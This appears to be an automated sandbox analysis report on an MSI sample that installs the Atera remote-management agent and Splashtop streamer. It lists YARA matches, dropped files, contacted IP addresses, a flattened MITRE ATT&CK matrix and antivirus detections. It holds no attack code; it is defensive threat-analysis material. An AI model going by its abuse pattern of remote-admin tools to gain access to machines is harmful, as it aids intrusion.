                                Source: Yara matchFile source: 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2648816776.0000021719FB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1955362018.000001BE62BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1793099468.000001C5E5CB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2267142526.0000020AA082C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2935401771.0000016BD0D10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2648816776.000002171A14A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1969655757.0000026900001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F72A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2256, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5780, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2084, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AteraAgent.exe PID: 2640, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AteraAgent.exe PID: 6200, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3320, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 2916, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 2932, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AteraAgent.exe PID: 1852, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 980, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3632, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cscript.exe PID: 6768, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AgentPackageSTRemote.exe PID: 1016, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: SplashtopStreamer.exe PID: 7384, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF6260B0A6EE189872.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFF7EC8F46D19662E2.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Config.Msi\44c50b.rbs, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF8B9C4281082EB5A9.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF8F3A4106A89D3FAA.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFE942440AACDF3AD6.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF8C6157FE5230C8C7.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF98EF70557B828906.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_000_dotnet_runtime_6.0.35_win_x64.msi.log, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF80F0F0EF5EAF0872.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFBAFD6533B3289355.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF91BDF3C96D5F451B.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_002_dotnet_host_6.0.35_win_x64.msi.log, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIDCAB.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF070AB763D94BC4D6.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_001_dotnet_hostfxr_6.0.35_win_x64.msi.log, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFE999D03EF0B2A4AD.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIDEDF.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF18D9F86597CA5126.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF1972A83F22094FA6.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFECDCDF0BA996B022.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF1D98EA98A0F27BD7.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF6770E5F65DEE8E27.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF8959754CB5C77D85.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF98A3B0A404DB694E.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIC961.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF45939A071886D6FE.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF48BCAB6E3000FF9C.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF4BDFDDF68F93C3AD.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\System32\InstallUtil.InstallLog, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF38B1B8C320DF517A.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF6B3BD24D01329A5D.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information1
                                Scripting                                		1
                                Replication Through Removable Media                                		541
                                Windows Management Instrumentation                                		1
                                Scripting                                		1
                                DLL Side-Loading                                		21
                                Disable or Modify Tools                                		1
                                Input Capture                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		2
                                Encrypted Channel                                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts3
                                Native API                                		1
                                DLL Side-Loading                                		31
                                Windows Service                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory11
                                Peripheral Device Discovery                                		Remote Desktop Protocol1
                                Input Capture                                		Junk DataExfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Command and Scripting Interpreter                                		31
                                Windows Service                                		121
                                Process Injection                                		4
                                Obfuscated Files or Information                                		Security Account Manager4
                                File and Directory Discovery                                		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Scheduled Task/Job                                		1
                                Scheduled Task/Job                                		1
                                Scheduled Task/Job                                		1
                                Software Packing                                		NTDS167
                                System Information Discovery                                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts11
                                Service Execution                                		1
                                Registry Run Keys / Startup Folder                                		1
                                Registry Run Keys / Startup Folder                                		1
                                Timestomp                                		LSA Secrets1
                                Query Registry                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                DLL Side-Loading                                		Cached Domain Credentials671
                                Security Software Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                File Deletion                                		DCSync361
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job123
                                Masquerading                                		Proc Filesystem2
                                Process Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                Modify Registry                                		/etc/passwd and /etc/shadow11
                                Application Window Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron361
                                Virtualization/Sandbox Evasion                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd121
                                Process Injection                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                Rundll32                                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1545758 Sample: Arquivo_4593167.msi Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 147 Multi AV Scanner detection for dropped file 2->147 149 Multi AV Scanner detection for submitted file 2->149 151 Yara detected AteraAgent 2->151 153 7 other signatures 2->153 9 msiexec.exe 501 887 2->9         started        13 AteraAgent.exe 2->13         started        15 AteraAgent.exe 2->15         started        18 2 other processes 2->18 process3 dnsIp4 97 C:\Windows\Installer\...\ARPPRODUCTICON.exe, PE32 9->97 dropped 99 C:\Windows\Installer\MSIFB85.tmp, PE32 9->99 dropped 101 C:\Windows\Installer\MSIF4AD.tmp, PE32 9->101 dropped 109 465 other files (402 malicious) 9->109 dropped 165 Sample is not signed and drops a device driver 9->165 20 msiexec.exe 9->20         started        24 msiexec.exe 9->24         started        26 AteraAgent.exe 9->26         started        29 msiexec.exe 9->29         started        103 C:\...\System.Management.dll, PE32 13->103 dropped 105 C:\...105ewtonsoft.Json.dll, PE32 13->105 dropped 107 C:\...\Microsoft.Win32.TaskScheduler.dll, PE32 13->107 dropped 111 300 other malicious files 13->111 dropped 167 Installs Task Scheduler Managed Wrapper 13->167 31 sc.exe 13->31         started        141 13.35.58.124 AMAZON-02US United States 15->141 143 13.35.58.7 AMAZON-02US United States 15->143 145 35.157.63.228 AMAZON-02US United States 15->145 113 8 other malicious files 15->113 dropped 169 Creates files in the system32 config directory 15->169 171 Reads the Security eventlog 15->171 173 Reads the System eventlog 15->173 33 AgentPackageSTRemote.exe 15->33         started        35 AgentPackageAgentInformation.exe 15->35         started        37 AgentPackageAgentInformation.exe 15->37         started        39 2 other processes 15->39 file5 signatures6 process7 dnsIp8 83 C:\...\SRCredentialProvider.dll (copy), PE32+ 20->83 dropped 85 C:\Windows\Temp\...\_isres_0x0409.dll, PE32 20->85 dropped 87 C:\Windows\Temp\...\_is9FE6.exe, PE32+ 20->87 dropped 95 14 other malicious files 20->95 dropped 155 Enables network access during safeboot for specific services 20->155 50 12 other processes 20->50 52 4 other processes 24->52 133 199.232.210.172 FASTLYUS United States 26->133 135 192.229.221.95 EDGECASTUS United States 26->135 89 C:\Windows\System32\InstallUtil.InstallLog, Unicode 26->89 dropped 91 C:\...\AteraAgent.InstallLog, Unicode 26->91 dropped 157 Reads the Security eventlog 26->157 159 Reads the System eventlog 26->159 56 3 other processes 29->56 41 conhost.exe 31->41         started        137 52.223.39.232 AMAZONEXPANSIONGB United States 33->137 139 13.35.58.89 AMAZON-02US United States 33->139 93 C:\Windows\Temp\SplashtopStreamer.exe, PE32 33->93 dropped 161 Creates files in the system32 config directory 33->161 43 SplashtopStreamer.exe 33->43         started        46 conhost.exe 33->46         started        48 conhost.exe 35->48         started        58 2 other processes 37->58 60 3 other processes 39->60 file9 signatures10 process11 dnsIp12 115 C:\Windows\Temp\unpack\PreVerCheck.exe, PE32 43->115 dropped 62 PreVerCheck.exe 43->62         started        65 conhost.exe 50->65         started        67 taskkill.exe 50->67         started        69 conhost.exe 50->69         started        131 40.119.152.241 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 52->131 117 C:\...\AlphaControlAgentInstallation.dll, PE32 52->117 dropped 119 C:\...\AlphaControlAgentInstallation.dll, PE32 52->119 dropped 121 C:\...\AlphaControlAgentInstallation.dll, PE32 52->121 dropped 123 13 other files (1 malicious) 52->123 dropped 163 System process connects to network (likely due to code injection or exploit) 52->163 71 conhost.exe 56->71         started        73 net1.exe 56->73         started        75 conhost.exe 56->75         started        77 conhost.exe 58->77         started        79 cscript.exe 58->79         started        file13 signatures14 process15 file16 125 C:\Windows\Temp\unpack\libssl-3.dll, PE32 62->125 dropped 127 C:\Windows\Temp\unpack\libcrypto-3.dll, PE32 62->127 dropped 129 C:\Windows\Temp\unpack\SRSocketCtrl.dll, PE32 62->129 dropped 81 msiexec.exe 62->81         started        process17

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                Arquivo_4593167.msi24%ReversingLabsWin32.Trojan.Atera

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe21%ReversingLabsWin32.Trojan.Atera
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Infrastructure.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Tools.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.EnvironmentVariables.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.FileExtensions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.UserSecrets.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileSystemGlobbing.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Abstractions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Configuration.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Console.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Debug.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventLog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventSource.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.ConfigurationExtensions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Primitives.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Hosting.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Logging.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.DiagnosticSource.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.EventLog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Text.Encodings.Web.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Text.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\de\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\es\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\fr\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\it\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\pl\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\ru\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\browser\lib\net6.0\System.Text.Encodings.Web.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.Messages.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.ServiceProcess.ServiceController.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\NLog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\StructureMap.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Buffers.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Diagnostics.DiagnosticSource.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Memory.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Runtime.CompilerServices.Unsafe.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe0%ReversingLabs
